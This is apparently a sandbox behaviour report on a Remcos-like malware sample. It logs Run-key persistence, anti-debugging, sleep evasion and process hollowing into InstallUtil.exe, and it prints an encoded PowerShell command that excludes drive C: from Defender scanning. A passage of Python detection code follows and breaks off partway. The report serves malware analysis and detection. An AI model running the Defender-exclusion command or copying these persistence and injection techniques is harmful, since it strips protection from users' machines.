Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_004172C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0040CE58
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040D26E Sleep,ExitProcess
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe TID: 5096 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 6616 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 3488 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00416FC6 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6076
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1160
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | API call chain: ExitProcess graph end node (graph_17-45240)
          Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V
          Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
          Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040620E FindFirstFileW,FindNextFileW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044A569 FindFirstFileExA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0043F394 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040F87E SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Process token adjusted: Debug (2 events)
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Memory allocated: page read and write | page guard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00431495 SetUnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00438462 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0043190C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: Base64 decoded: Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\' (2 events)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040FC77 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (2 events)
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (4 events)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00415E25 mouse_event
          Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager2ee70d
          Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044E084 GetLocaleInfoW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044E1AD GetLocaleInfoW,GetLocaleInfoW,GetACP
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044E2B4 GetLocaleInfoW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044E381 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040D39C GetLocaleInfoA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00444444 EnumSystemLocalesW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044492D GetLocaleInfoW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044DA49 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044DCC1 EnumSystemLocalesW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044DD0C EnumSystemLocalesW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044DDA7 EnumSystemLocalesW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044DE34 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Queries volume information: C:\Users\user\Desktop\kyFBQxVbsg.exe VolumeInformation
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 events)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 events)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 events)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 events)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 events)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation (2 events)
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (2 events)
          Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation (2 events)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00431590 cpuid
          Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00404F28 GetLocalTime,CreateEventA,CreateThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004451D0 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00417E20 GetComputerNameExW,GetUserNameW
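Two records in this section carry the most useful detection signal: the powershell.exe launch with an -enc argument (the decoded form is the Defender exclusion shown at the top of the section), and the InstallUtil.exe function 17_2_00414EA8, whose call order (CreateProcessW, GetThreadContext, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread) is the classic process-hollowing sequence that puts the Remcos payload inside a legitimate .NET binary. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it takes three lines copied from this report, decodes the -enc blob the way PowerShell does (base64 of UTF-16LE text), flags the Set-MpPreference exclusion and its drive-root scope, and checks each "Code function" chain for the hollowing sequence as an ordered subsequence. The accepted -EncodedCommand prefixes, the list of Defender parameters treated as tampering, and the API sequence are assumptions chosen for the example, not report content.

```python
"""Triage helpers for sandbox behaviour lines of the kind shown above.

Added example, not part of the Joe Sandbox report or of the sample.
"""
import base64
import binascii
import re
from typing import List, Optional

# Three evidence lines copied from the report above: the PowerShell launch,
# the 17_2_00414EA8 chain, and the service-enumeration chain 17_2_00416FC6
# as a negative control.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==',
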